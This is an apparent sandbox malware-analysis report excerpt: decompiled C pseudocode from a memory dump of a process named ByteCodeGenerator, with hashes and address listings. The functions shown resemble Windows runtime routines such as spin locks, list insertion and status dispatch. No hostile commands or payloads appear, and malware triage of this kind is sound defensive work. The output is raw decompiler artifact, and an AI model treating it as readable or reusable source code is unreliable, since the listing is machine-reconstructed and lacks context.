                                  • Opcode ID: b752730e3d1802c8bec2511d9b4c5200c45581a9cb85e31a22a3a90422343800
                                  • Instruction ID: b6943e99d7b4de4ee8670cabb2af048eb86687dfc610f749d95b21c0ae6fa3e0
                                  • Opcode Fuzzy Hash: b752730e3d1802c8bec2511d9b4c5200c45581a9cb85e31a22a3a90422343800
                                  • Instruction Fuzzy Hash: F251AAB5E00615CFDB14CFA8C490AAEFBF5BB4A310F2481ABD555AF305DB30A945CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 96%
                                  			E0343EF40(intOrPtr __ecx) {
                                  				char _v5;
                                  				char _v6;
                                  				char _v7;
                                  				char _v8;
                                  				signed int _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				intOrPtr _t58;
                                  				char _t59;
                                  				signed char _t69;
                                  				void* _t73;
                                  				signed int _t74;
                                  				char _t79;
                                  				signed char _t81;
                                  				signed int _t85;
                                  				signed int _t87;
                                  				intOrPtr _t90;
                                  				signed char* _t91;
                                  				void* _t92;
                                  				signed int _t94;
                                  				void* _t96;
                                  
                                  				_t90 = __ecx;
                                  				_v16 = __ecx;
                                  				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                                  					_t58 =  *((intOrPtr*)(__ecx));
                                  					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                                  						E03429080(_t73, __ecx, __ecx, _t92);
                                  					}
                                  				}
                                  				_t74 = 0;
                                  				_t96 =  *0x7ffe036a - 1;
                                  				_v12 = 0;
                                  				_v7 = 0;
                                  				if(_t96 > 0) {
                                  					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                                  					_v12 = _t74;
                                  					_v7 = _t96 != 0;
                                  				}
                                  				_t79 = 0;
                                  				_v8 = 0;
                                  				_v5 = 0;
                                  				while(1) {
                                  					L4:
                                  					_t59 = 1;
                                  					L5:
                                  					while(1) {
                                  						if(_t59 == 0) {
                                  							L12:
                                  							_t21 = _t90 + 4; // 0x77cfc21e
                                  							_t87 =  *_t21;
                                  							_v6 = 0;
                                  							if(_t79 != 0) {
                                  								if((_t87 & 0x00000002) != 0) {
                                  									goto L19;
                                  								}
                                  								if((_t87 & 0x00000001) != 0) {
                                  									_v6 = 1;
                                  									_t74 = _t87 ^ 0x00000003;
                                  								} else {
                                  									_t51 = _t87 - 2; // -2
                                  									_t74 = _t51;
                                  								}
                                  								goto L15;
                                  							} else {
                                  								if((_t87 & 0x00000001) != 0) {
                                  									_v6 = 1;
                                  									_t74 = _t87 ^ 0x00000001;
                                  								} else {
                                  									_t26 = _t87 - 4; // -4
                                  									_t74 = _t26;
                                  									if((_t74 & 0x00000002) == 0) {
                                  										_t74 = _t74 - 2;
                                  									}
                                  								}
                                  								L15:
                                  								if(_t74 == _t87) {
                                  									L19:
                                  									E03422D8A(_t74, _t90, _t87, _t90);
                                  									_t74 = _v12;
                                  									_v8 = 1;
                                  									if(_v7 != 0 && _t74 > 0x64) {
                                  										_t74 = _t74 - 1;
                                  										_v12 = _t74;
                                  									}
                                  									_t79 = _v5;
                                  									goto L4;
                                  								}
                                  								asm("lock cmpxchg [esi], ecx");
                                  								if(_t87 != _t87) {
                                  									_t74 = _v12;
                                  									_t59 = 0;
                                  									_t79 = _v5;
                                  									continue;
                                  								}
                                  								if(_v6 != 0) {
                                  									_t74 = _v12;
                                  									L25:
                                  									if(_v7 != 0) {
                                  										if(_t74 < 0x7d0) {
                                  											if(_v8 == 0) {
                                  												_t74 = _t74 + 1;
                                  											}
                                  										}
                                  										_t38 = _t90 + 0x14; // 0x0
                                  										_t39 = _t90 + 0x14; // 0x0
                                  										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                                  										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                  											_t85 = _t85 & 0xff000000;
                                  										}
                                  										 *(_t90 + 0x14) = _t85;
                                  									}
                                  									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                  									 *((intOrPtr*)(_t90 + 8)) = 1;
                                  									return 0;
                                  								}
                                  								_v5 = 1;
                                  								_t87 = _t74;
                                  								goto L19;
                                  							}
                                  						}
                                  						_t94 = _t74;
                                  						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                                  						if(_t74 == 0) {
                                  							goto L12;
                                  						} else {
                                  							_t91 = _t90 + 4;
                                  							goto L8;
                                  							L9:
                                  							while((_t81 & 0x00000001) != 0) {
                                  								_t69 = _t81;
                                  								asm("lock cmpxchg [edi], edx");
                                  								if(_t69 != _t81) {
                                  									_t81 = _t69;
                                  									continue;
                                  								}
                                  								_t90 = _v16;
                                  								goto L25;
                                  							}
                                  							asm("pause");
                                  							_t94 = _t94 - 1;
                                  							if(_t94 != 0) {
                                  								L8:
                                  								_t81 =  *_t91;
                                  								goto L9;
                                  							} else {
                                  								_t90 = _v16;
                                  								_t79 = _v5;
                                  								goto L12;
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}




























                                  0x0343ef4b
                                  0x0343ef4d
                                  0x0343ef57
                                  0x0343f0bd
                                  0x0343f0c2
                                  0x0343f0d2
                                  0x0343f0d2
                                  0x0343f0c2
                                  0x0343ef5d
                                  0x0343ef5f
                                  0x0343ef67
                                  0x0343ef6a
                                  0x0343ef6d
                                  0x0343ef74
                                  0x0343ef7f
                                  0x0343ef82
                                  0x0343ef82
                                  0x0343ef86
                                  0x0343ef88
                                  0x0343ef8c
                                  0x0343ef8f
                                  0x0343ef8f
                                  0x0343ef8f
                                  0x00000000
                                  0x0343ef91
                                  0x0343ef93
                                  0x0343efc4
                                  0x0343efc4
                                  0x0343efc4
                                  0x0343efca
                                  0x0343efd0
                                  0x0343f0a6
                                  0x00000000
                                  0x00000000
                                  0x0343f0af
                                  0x0348bb06
                                  0x0348bb0a
                                  0x0343f0b5
                                  0x0343f0b5
                                  0x0343f0b5
                                  0x0343f0b5
                                  0x00000000
                                  0x0343efd6
                                  0x0343efd9
                                  0x0343f0de
                                  0x0343f0e2
                                  0x0343efdf
                                  0x0343efdf
                                  0x0343efdf
                                  0x0343efe5
                                  0x0348bafc
                                  0x0348bafc
                                  0x0343efe5
                                  0x0343efeb
                                  0x0343efed
                                  0x0343f00f
                                  0x0343f011
                                  0x0343f01a
                                  0x0343f01d
                                  0x0343f021
                                  0x0343f028
                                  0x0343f029
                                  0x0343f029
                                  0x0343f02c
                                  0x00000000
                                  0x0343f02c
                                  0x0343eff3
                                  0x0343eff9
                                  0x0343f0ea
                                  0x0343f0ed
                                  0x0343f0ef
                                  0x00000000
                                  0x0343f0ef
                                  0x0343f003
                                  0x0348bb12
                                  0x0343f045
                                  0x0343f049
                                  0x0343f051
                                  0x0343f09e
                                  0x0343f0a0
                                  0x0343f0a0
                                  0x0343f09e
                                  0x0343f053
                                  0x0343f064
                                  0x0343f064
                                  0x0343f06b
                                  0x0348bb1a
                                  0x0348bb1a
                                  0x0343f071
                                  0x0343f071
                                  0x0343f07d
                                  0x0343f082
                                  0x0343f08f
                                  0x0343f08f
                                  0x0343f009
                                  0x0343f00d
                                  0x00000000
                                  0x0343f00d
                                  0x0343efd0
                                  0x0343ef97
                                  0x0343efa5
                                  0x0343efaa
                                  0x00000000
                                  0x0343efac
                                  0x0343efac
                                  0x0343efac
                                  0x00000000
                                  0x0343efb2
                                  0x0343f036
                                  0x0343f03a
                                  0x0343f040
                                  0x0343f090
                                  0x00000000
                                  0x0343f092
                                  0x0343f042
                                  0x00000000
                                  0x0343f042
                                  0x0343efb7
                                  0x0343efb9
                                  0x0343efbc
                                  0x0343efb0
                                  0x0343efb0
                                  0x00000000
                                  0x0343efbe
                                  0x0343efbe
                                  0x0343efc1
                                  0x00000000
                                  0x0343efc1
                                  0x0343efbc
                                  0x0343efaa
                                  0x0343ef91

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                  • Instruction ID: b1435f3792a9cb2a70f90f226fdd77287bb0feadce76eba1c01e469a39e16625
                                  • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                  • Instruction Fuzzy Hash: 7851F331E05249EFDB10CB68C1807EFFBB1AF4A314F1881AAD4559B381C3B5A9CAC745
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			E034F740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                                  				signed short* _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _t55;
                                  				void* _t56;
                                  				intOrPtr* _t66;
                                  				intOrPtr* _t69;
                                  				void* _t74;
                                  				intOrPtr* _t78;
                                  				intOrPtr* _t81;
                                  				intOrPtr* _t82;
                                  				intOrPtr _t83;
                                  				signed short* _t84;
                                  				intOrPtr _t85;
                                  				signed int _t87;
                                  				intOrPtr* _t90;
                                  				intOrPtr* _t93;
                                  				intOrPtr* _t94;
                                  				void* _t98;
                                  
                                  				_t84 = __edx;
                                  				_t80 = __ecx;
                                  				_push(__ecx);
                                  				_push(__ecx);
                                  				_t55 = __ecx;
                                  				_v8 = __edx;
                                  				_t87 =  *__edx & 0x0000ffff;
                                  				_v12 = __ecx;
                                  				_t3 = _t55 + 0x154; // 0x154
                                  				_t93 = _t3;
                                  				_t78 =  *_t93;
                                  				_t4 = _t87 + 2; // 0x2
                                  				_t56 = _t4;
                                  				while(_t78 != _t93) {
                                  					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                                  						L4:
                                  						_t78 =  *_t78;
                                  						continue;
                                  					} else {
                                  						_t7 = _t78 + 0x18; // 0x18
                                  						if(E0347D4F0(_t7, _t84[2], _t87) == _t87) {
                                  							_t40 = _t78 + 0xc; // 0xc
                                  							_t94 = _t40;
                                  							_t90 =  *_t94;
                                  							while(_t90 != _t94) {
                                  								_t41 = _t90 + 8; // 0x8
                                  								_t74 = E0346F380(_a4, _t41, 0x10);
                                  								_t98 = _t98 + 0xc;
                                  								if(_t74 != 0) {
                                  									_t90 =  *_t90;
                                  									continue;
                                  								}
                                  								goto L12;
                                  							}
                                  							_t82 = L03444620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                  							if(_t82 != 0) {
                                  								_t46 = _t78 + 0xc; // 0xc
                                  								_t69 = _t46;
                                  								asm("movsd");
                                  								asm("movsd");
                                  								asm("movsd");
                                  								asm("movsd");
                                  								_t85 =  *_t69;
                                  								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                  									L20:
                                  									_t82 = 3;
                                  									asm("int 0x29");
                                  								}
                                  								 *((intOrPtr*)(_t82 + 4)) = _t69;
                                  								 *_t82 = _t85;
                                  								 *((intOrPtr*)(_t85 + 4)) = _t82;
                                  								 *_t69 = _t82;
                                  								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                                  								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                                  								goto L11;
                                  							} else {
                                  								L18:
                                  								_push(0xe);
                                  								_pop(0);
                                  							}
                                  						} else {
                                  							_t84 = _v8;
                                  							_t9 = _t87 + 2; // 0x2
                                  							_t56 = _t9;
                                  							goto L4;
                                  						}
                                  					}
                                  					L12:
                                  					return 0;
                                  				}
                                  				_t10 = _t87 + 0x1a; // 0x1a
                                  				_t78 = L03444620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                                  				if(_t78 == 0) {
                                  					goto L18;
                                  				} else {
                                  					_t12 = _t87 + 2; // 0x2
                                  					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                                  					_t16 = _t78 + 0x18; // 0x18
                                  					E0346F3E0(_t16, _v8[2], _t87);
                                  					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                                  					_t19 = _t78 + 0xc; // 0xc
                                  					_t66 = _t19;
                                  					 *((intOrPtr*)(_t66 + 4)) = _t66;
                                  					 *_t66 = _t66;
                                  					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                                  					_t81 = L03444620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                  					if(_t81 == 0) {
                                  						goto L18;
                                  					} else {
                                  						_t26 = _t78 + 0xc; // 0xc
                                  						_t69 = _t26;
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						_t85 =  *_t69;
                                  						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                  							goto L20;
                                  						} else {
                                  							 *((intOrPtr*)(_t81 + 4)) = _t69;
                                  							 *_t81 = _t85;
                                  							 *((intOrPtr*)(_t85 + 4)) = _t81;
                                  							 *_t69 = _t81;
                                  							_t83 = _v12;
                                  							 *(_t78 + 8) = 1;
                                  							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                  							_t34 = _t83 + 0x154; // 0x1ba
                                  							_t69 = _t34;
                                  							_t85 =  *_t69;
                                  							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                  								goto L20;
                                  							} else {
                                  								 *_t78 = _t85;
                                  								 *((intOrPtr*)(_t78 + 4)) = _t69;
                                  								 *((intOrPtr*)(_t85 + 4)) = _t78;
                                  								 *_t69 = _t78;
                                  								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                  							}
                                  						}
                                  						goto L11;
                                  					}
                                  				}
                                  				goto L12;
                                  			}





















                                  0x034f740d
                                  0x034f740d
                                  0x034f7412
                                  0x034f7413
                                  0x034f7416
                                  0x034f7418
                                  0x034f741c
                                  0x034f741f
                                  0x034f7422
                                  0x034f7422
                                  0x034f7428
                                  0x034f742a
                                  0x034f742a
                                  0x034f7451
                                  0x034f7432
                                  0x034f744f
                                  0x034f744f
                                  0x00000000
                                  0x034f7434
                                  0x034f7438
                                  0x034f7443
                                  0x034f7517
                                  0x034f7517
                                  0x034f751a
                                  0x034f7535
                                  0x034f7520
                                  0x034f7527
                                  0x034f752c
                                  0x034f7531
                                  0x034f7533
                                  0x00000000
                                  0x034f7533
                                  0x00000000
                                  0x034f7531
                                  0x034f754b
                                  0x034f754f
                                  0x034f755c
                                  0x034f755c
                                  0x034f755f
                                  0x034f7560
                                  0x034f7561
                                  0x034f7562
                                  0x034f7563
                                  0x034f7568
                                  0x034f756a
                                  0x034f756c
                                  0x034f756d
                                  0x034f756d
                                  0x034f756f
                                  0x034f7572
                                  0x034f7574
                                  0x034f7577
                                  0x034f757c
                                  0x034f757f
                                  0x00000000
                                  0x034f7551
                                  0x034f7551
                                  0x034f7551
                                  0x034f7553
                                  0x034f7553
                                  0x034f7449
                                  0x034f7449
                                  0x034f744c
                                  0x034f744c
                                  0x00000000
                                  0x034f744c
                                  0x034f7443
                                  0x034f750e
                                  0x034f7514
                                  0x034f7514
                                  0x034f7455
                                  0x034f7469
                                  0x034f746d
                                  0x00000000
                                  0x034f7473
                                  0x034f7473
                                  0x034f7476
                                  0x034f7480
                                  0x034f7484
                                  0x034f748e
                                  0x034f7493
                                  0x034f7493
                                  0x034f7496
                                  0x034f7499
                                  0x034f74a1
                                  0x034f74b1
                                  0x034f74b5
                                  0x00000000
                                  0x034f74bb
                                  0x034f74c1
                                  0x034f74c1
                                  0x034f74c4
                                  0x034f74c5
                                  0x034f74c6
                                  0x034f74c7
                                  0x034f74c8
                                  0x034f74cd
                                  0x00000000
                                  0x034f74d3
                                  0x034f74d3
                                  0x034f74d6
                                  0x034f74d8
                                  0x034f74db
                                  0x034f74dd
                                  0x034f74e0
                                  0x034f74e7
                                  0x034f74ee
                                  0x034f74ee
                                  0x034f74f4
                                  0x034f74f9
                                  0x00000000
                                  0x034f74fb
                                  0x034f74fb
                                  0x034f74fd
                                  0x034f7500
                                  0x034f7503
                                  0x034f7505
                                  0x034f7505
                                  0x034f74f9
                                  0x00000000
                                  0x034f74cd
                                  0x034f74b5
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                  • Instruction ID: 362151811f658e97d799dfba867dab10914b458259c56e8525b1d2984c99d36f
                                  • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                  • Instruction Fuzzy Hash: BA51AF71600606EFDB15CF14C880A66FBB5FF45344F18C0BAEA089F211E375E946CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 97%
                                  			E03452990() {
                                  				signed int* _t62;
                                  				signed int _t64;
                                  				intOrPtr _t66;
                                  				signed short* _t69;
                                  				intOrPtr _t76;
                                  				signed short* _t79;
                                  				void* _t81;
                                  				signed int _t82;
                                  				signed short* _t83;
                                  				signed int _t87;
                                  				intOrPtr _t91;
                                  				void* _t98;
                                  				signed int _t99;
                                  				void* _t101;
                                  				signed int* _t102;
                                  				void* _t103;
                                  				void* _t104;
                                  				void* _t107;
                                  
                                  				_push(0x20);
                                  				_push(0x34fff00);
                                  				E0347D08C(_t81, _t98, _t101);
                                  				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                                  				_t99 = 0;
                                  				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                                  				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                                  				if(_t82 == 0) {
                                  					_t62 = 0xc0000100;
                                  				} else {
                                  					 *((intOrPtr*)(_t103 - 4)) = 0;
                                  					_t102 = 0xc0000100;
                                  					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                                  					_t64 = 4;
                                  					while(1) {
                                  						 *(_t103 - 0x24) = _t64;
                                  						if(_t64 == 0) {
                                  							break;
                                  						}
                                  						_t87 = _t64 * 0xc;
                                  						 *(_t103 - 0x2c) = _t87;
                                  						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x3401664));
                                  						if(_t107 <= 0) {
                                  							if(_t107 == 0) {
                                  								_t79 = E0346E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x3401668)), _t82);
                                  								_t104 = _t104 + 0xc;
                                  								__eflags = _t79;
                                  								if(__eflags == 0) {
                                  									_t102 = E034A51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x340166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                  									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                                  									break;
                                  								} else {
                                  									_t64 =  *(_t103 - 0x24);
                                  									goto L5;
                                  								}
                                  								goto L13;
                                  							} else {
                                  								L5:
                                  								_t64 = _t64 - 1;
                                  								continue;
                                  							}
                                  						}
                                  						break;
                                  					}
                                  					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                  					__eflags = _t102;
                                  					if(_t102 < 0) {
                                  						__eflags = _t102 - 0xc0000100;
                                  						if(_t102 == 0xc0000100) {
                                  							_t83 =  *((intOrPtr*)(_t103 + 8));
                                  							__eflags = _t83;
                                  							if(_t83 != 0) {
                                  								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                                  								__eflags =  *_t83 - _t99;
                                  								if( *_t83 == _t99) {
                                  									_t102 = 0xc0000100;
                                  									goto L19;
                                  								} else {
                                  									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                                  									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                                  									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                                  									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                                  										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                                  										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                                  											L26:
                                  											_t102 = E03452AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                  											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                  											__eflags = _t102 - 0xc0000100;
                                  											if(_t102 != 0xc0000100) {
                                  												goto L12;
                                  											} else {
                                  												_t99 = 1;
                                  												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                                  												goto L18;
                                  											}
                                  										} else {
                                  											_t69 = E03436600( *((intOrPtr*)(_t91 + 0x1c)));
                                  											__eflags = _t69;
                                  											if(_t69 != 0) {
                                  												goto L26;
                                  											} else {
                                  												_t83 =  *((intOrPtr*)(_t103 + 8));
                                  												goto L18;
                                  											}
                                  										}
                                  									} else {
                                  										L18:
                                  										_t102 = E03452C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                                  										L19:
                                  										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                  										goto L12;
                                  									}
                                  								}
                                  								L28:
                                  							} else {
                                  								E0343EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                  								 *((intOrPtr*)(_t103 - 4)) = 1;
                                  								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                                  								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                                  								_t76 = E03452AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                                  								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                                  								__eflags = _t76 - 0xc0000100;
                                  								if(_t76 == 0xc0000100) {
                                  									 *((intOrPtr*)(_t103 - 0x1c)) = E03452C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                                  								}
                                  								 *((intOrPtr*)(_t103 - 4)) = _t99;
                                  								E03452ACB();
                                  							}
                                  						}
                                  					}
                                  					L12:
                                  					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                                  					_t62 = _t102;
                                  				}
                                  				L13:
                                  				return E0347D0D1(_t62);
                                  				goto L28;
                                  			}





















                                  0x03452990
                                  0x03452992
                                  0x03452997
                                  0x034529a3
                                  0x034529a6
                                  0x034529ab
                                  0x034529ad
                                  0x034529b2
                                  0x03495c80
                                  0x034529b8
                                  0x034529b8
                                  0x034529bb
                                  0x034529c0
                                  0x034529c5
                                  0x034529c6
                                  0x034529c6
                                  0x034529cb
                                  0x00000000
                                  0x00000000
                                  0x034529cd
                                  0x034529d0
                                  0x034529d9
                                  0x034529db
                                  0x034529dd
                                  0x03452a7f
                                  0x03452a84
                                  0x03452a87
                                  0x03452a89
                                  0x03495ca1
                                  0x03495ca3
                                  0x00000000
                                  0x03452a8f
                                  0x03452a8f
                                  0x00000000
                                  0x03452a8f
                                  0x00000000
                                  0x034529e3
                                  0x034529e3
                                  0x034529e3
                                  0x00000000
                                  0x034529e3
                                  0x034529dd
                                  0x00000000
                                  0x034529db
                                  0x034529e6
                                  0x034529e9
                                  0x034529eb
                                  0x034529ed
                                  0x034529f3
                                  0x034529f5
                                  0x034529f8
                                  0x034529fa
                                  0x03452a97
                                  0x03452a9a
                                  0x03452a9d
                                  0x03452add
                                  0x00000000
                                  0x03452a9f
                                  0x03452aa2
                                  0x03452aa5
                                  0x03452aa8
                                  0x03452aab
                                  0x03495cab
                                  0x03495caf
                                  0x03495cc5
                                  0x03495cda
                                  0x03495cdc
                                  0x03495cdf
                                  0x03495ce5
                                  0x00000000
                                  0x03495ceb
                                  0x03495ced
                                  0x03495cee
                                  0x00000000
                                  0x03495cee
                                  0x03495cb1
                                  0x03495cb4
                                  0x03495cb9
                                  0x03495cbb
                                  0x00000000
                                  0x03495cbd
                                  0x03495cbd
                                  0x00000000
                                  0x03495cbd
                                  0x03495cbb
                                  0x03452ab1
                                  0x03452ab1
                                  0x03452ac4
                                  0x03452ac6
                                  0x03452ac6
                                  0x00000000
                                  0x03452ac6
                                  0x03452aab
                                  0x00000000
                                  0x03452a00
                                  0x03452a09
                                  0x03452a0e
                                  0x03452a21
                                  0x03452a24
                                  0x03452a35
                                  0x03452a3a
                                  0x03452a3d
                                  0x03452a42
                                  0x03452a59
                                  0x03452a59
                                  0x03452a5c
                                  0x03452a5f
                                  0x03452a5f
                                  0x034529fa
                                  0x034529f3
                                  0x03452a64
                                  0x03452a64
                                  0x03452a6b
                                  0x03452a6b
                                  0x03452a6d
                                  0x03452a72
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9226e57651702b4650785bd2e530c73906211c113b978a2b4e43a46f205d1194
                                  • Instruction ID: 594838c806d0704ca7ec2d750af46b55634f719ee25799e21eac4a1961b64b58
                                  • Opcode Fuzzy Hash: 9226e57651702b4650785bd2e530c73906211c113b978a2b4e43a46f205d1194
                                  • Instruction Fuzzy Hash: AA511175E002099FDF25CF55C880A9EBBB5BB48210F18845BF811AF221C3B59952CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E03454BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                                  				signed int _v8;
                                  				short _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				char _v36;
                                  				char _v156;
                                  				short _v158;
                                  				intOrPtr _v160;
                                  				char _v164;
                                  				intOrPtr _v168;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int _t45;
                                  				intOrPtr _t74;
                                  				signed char _t77;
                                  				intOrPtr _t84;
                                  				char* _t85;
                                  				void* _t86;
                                  				intOrPtr _t87;
                                  				signed short _t88;
                                  				signed int _t89;
                                  
                                  				_t83 = __edx;
                                  				_v8 =  *0x351d360 ^ _t89;
                                  				_t45 = _a8 & 0x0000ffff;
                                  				_v158 = __edx;
                                  				_v168 = __ecx;
                                  				if(_t45 == 0) {
                                  					L22:
                                  					_t86 = 6;
                                  					L12:
                                  					E0342CC50(_t86);
                                  					L11:
                                  					return E0346B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                                  				}
                                  				_t77 = _a4;
                                  				if((_t77 & 0x00000001) != 0) {
                                  					goto L22;
                                  				}
                                  				_t8 = _t77 + 0x34; // 0xdce0ba00
                                  				if(_t45 !=  *_t8) {
                                  					goto L22;
                                  				}
                                  				_t9 = _t77 + 0x24; // 0x3518504
                                  				E03442280(_t9, _t9);
                                  				_t87 = 0x78;
                                  				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                                  				E0346FA60( &_v156, 0, _t87);
                                  				_t13 = _t77 + 0x30; // 0x3db8
                                  				_t85 =  &_v156;
                                  				_v36 =  *_t13;
                                  				_v28 = _v168;
                                  				_v32 = 0;
                                  				_v24 = 0;
                                  				_v20 = _v158;
                                  				_v160 = 0;
                                  				while(1) {
                                  					_push( &_v164);
                                  					_push(_t87);
                                  					_push(_t85);
                                  					_push(0x18);
                                  					_push( &_v36);
                                  					_push(0x1e);
                                  					_t88 = E0346B0B0();
                                  					if(_t88 != 0xc0000023) {
                                  						break;
                                  					}
                                  					if(_t85 !=  &_v156) {
                                  						L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                                  					}
                                  					_t84 = L03444620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                                  					_v168 = _v164;
                                  					if(_t84 == 0) {
                                  						_t88 = 0xc0000017;
                                  						goto L19;
                                  					} else {
                                  						_t74 = _v160 + 1;
                                  						_v160 = _t74;
                                  						if(_t74 >= 0x10) {
                                  							L19:
                                  							_t86 = E0342CCC0(_t88);
                                  							if(_t86 != 0) {
                                  								L8:
                                  								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                                  								_t30 = _t77 + 0x24; // 0x3518504
                                  								E0343FFB0(_t77, _t84, _t30);
                                  								if(_t84 != 0 && _t84 !=  &_v156) {
                                  									L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                                  								}
                                  								if(_t86 != 0) {
                                  									goto L12;
                                  								} else {
                                  									goto L11;
                                  								}
                                  							}
                                  							L6:
                                  							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                                  							if(_v164 != 0) {
                                  								_t83 = _t84;
                                  								E03454F49(_t77, _t84);
                                  							}
